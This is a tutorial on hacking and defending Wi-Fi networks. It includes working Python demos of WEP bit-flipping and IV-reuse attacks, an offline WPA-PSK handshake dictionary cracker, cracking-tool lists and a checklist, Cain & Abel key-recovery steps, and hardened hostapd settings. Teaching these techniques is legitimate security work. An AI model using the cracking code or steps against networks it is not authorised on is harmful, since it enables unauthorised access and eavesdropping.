Wireless networks are accessible to anyone within transmission range of the router, which makes them vulnerable to attack; hotspots in public places such as airports, restaurants and parks are the obvious example. In this article we look at how a Wi-Fi network is hacked and how it can be defended.
In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect yourself from such attacks.
- What is a wireless network?
- How to join a wireless network?
- WEP and WPA wireless network authentication
- How to hack wireless networks
- How to secure wireless networks
- Hacking activity: cracking the wireless password
A wireless network is a network that uses radio waves to connect computers and other devices. IEEE 802.11 specifies the physical layer (layer 1 of the OSI model) and the MAC sublayer of the data link layer (layer 2); everything above that is the same IP stack used on wired networks, so an attacker who gets past wireless authentication has the same reach as someone plugged into a wired port.
You will need a wireless network enabled device such as a laptop, tablet or smartphone, and you will need to be within transmission range of a wireless access point. Most devices (if the wireless option is enabled) will show a list of available networks. If a network is not password protected, just click Connect. If it is password protected, you will need the password (or another credential) to join it.
Because the network is easily accessible to anyone with a wireless network-enabled device, most networks are password protected. Let's take a look at some of the more commonly used authentication techniques.
WEP stands for Wired Equivalent Privacy. It was developed for the IEEE 802.11 WLAN standards and was part of the original 1997 standard; its goal was to provide privacy equivalent to that of a wired network. WEP works by encrypting data transmitted over the network to protect it from eavesdropping. It was formally deprecated in 2004 with 802.11i, but WEP-only equipment is still encountered. WEP defines two authentication methods:
- Open System Authentication (OSA): any station that asks is authenticated. No credential is checked; access is governed only by whatever policy (if any) the access point applies afterwards.
- Shared Key Authentication (SKA): the access point sends the station a plaintext challenge. The station encrypts the challenge with the WEP key and sends it back; if the result matches what the AP computes with its own copy of the key, access is granted. Because the challenge and its encrypted form are both transmitted over the air, an eavesdropper obtains plaintext and ciphertext for the same keystream and can replay that keystream to authenticate without the key, so SKA is actually weaker than OSA with WEP encryption alone.
WEP has significant design flaws and vulnerabilities.
- Packet integrity is checked with a Cyclic Redundancy Check (CRC32), a linear, unkeyed checksum. An attacker who flips bits in the encrypted payload can compute the matching change to the encrypted checksum without knowing the key, so the modified packet is still accepted. This is the basis of the chopchop and fragmentation attacks and of arbitrary packet injection into a WEP network.
- WEP uses the RC4 stream cipher. The per-packet RC4 key is the concatenation of a 24-bit initialization vector (IV) and the secret key, which is 40 or 104 bits long, giving the advertised 64-bit or 128-bit key sizes. A 40-bit secret can be brute-forced outright, and even 104-bit keys fall to the statistical attacks below.
- Certain "weak" IVs produce RC4 keystreams whose first bytes leak information about the secret key (the FMS attack); later attacks (KoreK, PTW) recover a 104-bit key from a few tens of thousands of captured packets.
- Many vendors derive the WEP key from a passphrase with a simple generator, so the key is only as strong as the passphrase and is exposed to dictionary attacks.
- Key management is poorly implemented. The standard provides no way to distribute or rotate keys, so every station shares the same static key, and changing it on a large network is impractical.
- The 24-bit IV space (about 16.7 million values) is exhausted within hours on a busy network, and many cards simply count up from zero, so IVs repeat. Two packets encrypted under the same IV and key use the same keystream; XORing their ciphertexts yields the XOR of the plaintexts, and knowing one plaintext reveals the other and the keystream itself.
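The two WEP flaws that need no key at all, CRC32 linearity and IV reuse, are easy to demonstrate end to end. The following is an added example written for this article, not code from the original page or from any of the tools it lists: a minimal WEP encapsulation (RC4 over IV||key, CRC32 ICV) with an attacker who first rewrites a request inside an encrypted frame and patches the ICV, then reads a second frame by recovering the keystream from a known plaintext. The key, IV and frame contents are constructed for the demo.

```python
import struct
import zlib


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling followed by `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || (plaintext || ICV) XOR RC4(IV || secret)."""
    keystream = rc4(iv + secret, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    """Receiver side: decrypt and enforce the ICV check."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4(iv + secret, len(body)))
    data, received_icv = clear[:-4], clear[-4:]
    if received_icv != icv(data):
        raise ValueError("ICV mismatch: frame rejected")
    return data


# Flaw 1: CRC32 is linear. crc(a ^ d) == crc(a) ^ crc(d) ^ crc(zeros of the same length),
# so XORing `delta` into the encrypted payload and XORing crc(delta) ^ crc(zeros) into the
# encrypted ICV yields a frame the receiver accepts. No key, no plaintext needed.
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    ct, enc_icv = body[:-4], body[-4:]
    assert len(delta) == len(ct)
    icv_delta = xor(icv(delta), icv(b"\x00" * len(ct)))
    return iv + xor(ct, delta) + xor(enc_icv, icv_delta)


# Flaw 2: IV reuse. Same IV and secret give the same keystream, so a known plaintext
# for one frame recovers the keystream that decrypts every other frame under that IV.
def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Works for any frame no longer than the recovered keystream."""
    return xor(frame[3:], keystream)[:-4]


# Constructed sample: a 40-bit WEP key and an IV that the station reuses (both invented).
SECRET = bytes.fromhex("0a1b2c3d4e")
IV = b"\x00\x00\x01"
PLAINTEXT_A = b"GET /admin HTTP/1.0"
PLAINTEXT_B = b"PASS hunter2\r\n"
FRAME_A = wep_encrypt(SECRET, IV, PLAINTEXT_A)
FRAME_B = wep_encrypt(SECRET, IV, PLAINTEXT_B)


def bit_flip_demo() -> bytes:
    """Attacker rewrites '/admin' to '/index' inside FRAME_A; returns what the AP decrypts."""
    # To choose the new bytes the attacker must know the old ones at those offsets;
    # to flip arbitrary bits no knowledge of the plaintext is needed at all.
    delta = xor(PLAINTEXT_A, b"GET /index HTTP/1.0")
    return wep_decrypt(SECRET, flip_bits(FRAME_A, delta))


def naive_flip_rejected() -> bool:
    """The same modification without the ICV correction is caught by the CRC check."""
    delta = xor(PLAINTEXT_A, b"GET /index HTTP/1.0")
    tampered = FRAME_A[:3] + xor(FRAME_A[3:-4], delta) + FRAME_A[-4:]
    try:
        wep_decrypt(SECRET, tampered)
        return False
    except ValueError:
        return True


def iv_reuse_demo() -> bytes:
    """Attacker knows FRAME_A's plaintext (a predictable request) and reads FRAME_B."""
    ks = keystream_from_known_plaintext(FRAME_A, PLAINTEXT_A)
    return decrypt_with_keystream(FRAME_B, ks)
```

Real attacks do not need a full known plaintext: the chopchop attack guesses one byte at a time and uses the AP's accept/reject behaviour as the oracle, and the fixed 802.11/LLC/ARP headers give enough known bytes to seed keystream recovery.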
WPA stands for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP, designed so that it could be deployed as a firmware upgrade on most WEP hardware. It encrypts data on 802.11 WLANs with TKIP, which still uses RC4 but with a 48-bit IV (instead of WEP's 24 bits), per-packet key mixing and a keyed integrity check (Michael) in place of CRC32. Keys are temporal: derived per session and per station rather than shared statically. WPA2 (802.11i) replaced TKIP with CCMP (AES). WPA still has weaknesses:
- TKIP's Michael integrity check is weak; the Beck-Tews attack (2008) recovers the MIC key and lets an attacker inject a small number of forged packets.
- It is vulnerable to denial of service attacks. Management frames such as deauthentication are not authenticated unless 802.11w protected management frames are in use, so any attacker in range can knock clients off the network, and TKIP's MIC-failure countermeasure (the AP suspends the network for 60 seconds after two failures within a minute) can itself be triggered deliberately.
- Pre-shared keys are derived from a passphrase (PBKDF2-SHA1 over the passphrase with the SSID as salt, 4096 iterations). Anyone who captures a client's four-way handshake can test passphrase guesses offline, so weak passphrases are vulnerable to dictionary attacks.
Cracking is the process of exploiting security weaknesses in wireless networks to gain unauthorized access. WEP cracking refers to attacks on networks that use WEP for their security controls. There are basically two types of cracking:
- Passive cracking: the attacker only listens, collecting enough packets (IVs) to recover the key statistically. It generates no traffic of its own, so it is hard to detect, but on a quiet network it can take a long time.
- Active cracking: the attacker injects traffic, typically by replaying captured ARP requests so that the AP generates thousands of fresh, IV-bearing responses per minute. It is easier to detect than passive cracking but far faster.
WEP cracking tools
- Aircrack-ng: a suite of wireless auditing tools, including a capture tool (airodump-ng), an injection tool (aireplay-ng) and the WEP/WPA-PSK cracker itself (aircrack-ng). It can be downloaded from http://www.aircrack-ng.org/
- WEPCrack: an open source program for cracking 802.11 WEP keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
- Kismet: a wireless network detector, packet sniffer and intrusion detection system; it finds both visible and hidden (non-broadcast SSID) networks. https://www.kismetwireless.net/
- WepDecrypt: this tool uses active dictionary attacks to crack WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/
WPA-PSK uses a 256-bit pre-shared key for authentication, derived from an 8-to-63-character passphrase and the SSID. Short or predictable passphrases are vulnerable to dictionary attacks and the other techniques used to crack passwords; because the attack runs offline against a captured handshake, the access point's lockouts and logging do not help. The following tools can be used to recover WPA-PSK keys.
- coWPAtty: cracks WPA-PSK networks by running a dictionary attack against a captured four-way handshake; it can also use precomputed tables for common SSIDs. http://wirelessdefence.org/Contents/coWPAttyMain.htm
- Cain & Abel: this tool can decode capture files produced by other sniffing programs such as Wireshark. The capture files can contain WEP or WPA-PSK encrypted frames. http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
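What these WPA-PSK tools do internally, for the weakness described above (PBKDF2 passphrase derivation and offline testing against a captured handshake) and the tool list just given, is shown by the following added example. It is written for this article and is not the code of coWPAtty, Aircrack-ng or Cain & Abel. It derives the PMK and PTK as 802.11i specifies, builds a minimal EAPOL-Key message 2 and computes its MIC with the real passphrase to stand in for a sniffed handshake, then runs a wordlist against that capture. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demo.

```python
import hashlib
import hmac
import struct


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, 'Pairwise key expansion', min||max MACs || min||max nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = PTK[0:16] is the only part needed to verify the handshake MIC


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]  # MIC field sits at offset 81..97
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Minimal EAPOL-Key frame (handshake message 2, station -> AP) with the MIC field zeroed."""
    body = (
        b"\x02"                          # descriptor type: RSN key
        + struct.pack(">H", 0x010A)      # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + struct.pack(">H", 16)          # key length (CCMP)
        + b"\x00" * 7 + b"\x01"          # replay counter = 1
        + snonce                         # key nonce (32 bytes)
        + b"\x00" * 16                   # key IV
        + b"\x00" * 8                    # key RSC
        + b"\x00" * 8                    # key ID (reserved)
        + b"\x00" * 16                   # MIC placeholder
        + struct.pack(">H", len(key_data)) + key_data
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # 802.1X-2004 version, EAPOL-Key type


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic):
    """Offline dictionary attack: one PBKDF2 + one PRF per candidate, no traffic to the AP."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# Constructed "capture": values an attacker would read out of airodump-ng's .cap file.
SSID = "CoffeeShopWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"anonce-demo").digest()  # from message 1
SNONCE = hashlib.sha256(b"snonce-demo").digest()  # from message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP element
TRUE_PASSPHRASE = "sunshine2023"  # what the legitimate client knows


def capture_handshake(passphrase: str):
    """Stand-in for sniffing: the legitimate client computes message 2's MIC with the real key."""
    frame = build_eapol_msg2(SNONCE, RSN_IE)
    kck = wpa_ptk(wpa_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:81] + mic + frame[97:], mic


CAPTURED_FRAME, CAPTURED_MIC = capture_handshake(TRUE_PASSPHRASE)
WORDLIST = ["password", "12345678", "qwertyuiop", "sunshine2023", "letmein1"]


def run_attack(wordlist=WORDLIST):
    return crack_psk(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_FRAME, CAPTURED_MIC)
```

The cost per guess is dominated by the 4096 PBKDF2 iterations, which is why the tools listed above precompute PMKs for common SSIDs and why a long, unusual passphrase (and a non-default SSID, since the SSID is the salt) is the defence. The PMK function can be checked against the published 802.11i test vector: passphrase "password" with SSID "IEEE" must give f42c6fc5...a12e.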
- Sniffing: intercepting frames as they are transmitted over the air. Once the key is known, the captured data can be decrypted with tools such as Cain & Abel or Wireshark.
- Man in the Middle (MITM) attack: the attacker sits between the client and the network, for example by running a rogue access point that broadcasts the same SSID (an "evil twin"), and relays or alters the traffic in order to acquire sensitive information.
- Denial of Service attack: the primary purpose of this attack is to deny legitimate users access to network resources, typically by flooding the air with deauthentication or authentication frames. FataJack can be used to perform this type of attack.
You can recover the WEP or WPA passwords used to access a wireless network. This requires software and hardware resources and patience, and success also depends on how active the users of the target network are.
We will provide you with basic information that can help you get started. BackTrack was a Linux-based security distribution built on Ubuntu; it has since been discontinued and replaced by Kali Linux, which ships the same kind of toolset. It comes with a large number of security tools that can be used to gather information, assess vulnerabilities and perform exploits, among other things.
Some of the popular tools included in BackTrack are:
Cracking secure Wifi networks requires the patience and resources mentioned above. At a minimum, you will need the following tools.
- A wireless network adapter that supports monitor mode and packet injection (hardware); many built-in laptop adapters do not.
- Kali operating system. You can download it from here https://www.kali.org/downloads/
- Be within range of the target network. If users of the target network are actively using it, the chances of cracking it are significantly better: WEP cracking needs traffic to collect IVs, and WPA-PSK cracking needs a client whose handshake can be captured.
- Sufficient knowledge of Linux-based operating systems and practical knowledge of Aircrack-ng and its various scripts.
- Patience: recovering the password of a secured Wi-Fi network may take a while depending on a number of factors, some of which are beyond your control, such as how much traffic the target network's users generate while you are sniffing packets.
To minimize attacks on the wireless network, an organization may adopt the following policies:
- Changing the default passwords supplied with the hardware
- Enabling the authentication mechanism: WPA2 (or WPA3) rather than WEP, which cannot be made secure however long its key.
- Access to the network can be restricted to registered MAC addresses. Treat this as a minor hurdle only: MAC addresses are transmitted in the clear and are trivially spoofed by anyone sniffing the network.
- The use of strong WPA-PSK passphrases (long, and a combination of letters, numbers and symbols) reduces the chance of keys being recovered by dictionary and brute-force attacks; a non-default SSID helps too, because the SSID salts the key derivation and defeats precomputed tables.
- Host firewall software can also help reduce unauthorized access.
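As an added illustration of these policies (not taken from the original article), the two hostapd configurations below put the weak settings next to the hardened ones. They are two separate files; the interface name, SSIDs, passphrase and ACL path are assumptions.

```ini
# /etc/hostapd/hostapd-weak.conf  (what a WEP-era setup looks like; do not deploy)
interface=wlan0
# default SSID advertises the vendor, and with it the default credentials
ssid=linksys
hw_mode=g
channel=6
# 3 = open AND shared-key authentication; shared-key hands an eavesdropper a keystream
auth_algs=3
wep_default_key=0
# 40-bit WEP key: brute-forced outright, or recovered statistically from traffic
wep_key0=0A1B2C3D4E

# /etc/hostapd/hostapd-hardened.conf
interface=wlan0
ssid=CorpGuest
hw_mode=g
channel=6
# open system only; the real authentication is the WPA2 four-way handshake
auth_algs=1
# WPA2 only (no WPA/TKIP fallback)
wpa=2
wpa_key_mgmt=WPA-PSK
# AES-CCMP pairwise cipher; no TKIP
rsn_pairwise=CCMP
# long passphrase (8 to 63 characters allowed); the SSID above is the PBKDF2 salt
wpa_passphrase=correct-horse-battery-staple-4-wireless
# 2 = require 802.11w protected management frames: blocks deauthentication-flood DoS
ieee80211w=2
# 1 = deny unless the client MAC is in the accept file; spoofable, defence in depth only
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
```

hostapd treats the whole remainder of a line as the value, so comments must stay on their own lines as shown.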
In this practical scenario, we will use Cain & Abel to recover the wireless network passwords saved in Windows profiles on the local machine. Note that this reads locally stored credentials; it is not an over-the-air attack. We will also provide useful information that can be used to recover the WEP and WPA keys of wireless networks.
- Download Cain and Abel from the link provided above.
- Open Cain and Abel
- Make sure the Decoders tab is selected, then click Wireless Passwords in the navigation menu on the left-hand side
- Click the button with a plus sign
- Assuming the machine has previously connected to one or more secured wireless networks, you will get one row per saved profile
- The decoder shows the encryption type, the SSID and the key that was saved for each network.
- Wireless transmissions can be received by anyone within range; this presents many security risks.
- WEP stands for Wired Equivalent Privacy. It has design flaws that make it far easier to breach than later security implementations; a WEP network should be treated as no better than an open one.
- WPA stands for Wi-Fi Protected Access. It is more secure than WEP; WPA2 with CCMP (AES) and a long passphrase is the practical minimum.
- Intrusion detection systems can help detect unauthorized access
- A good security policy can help protect a network.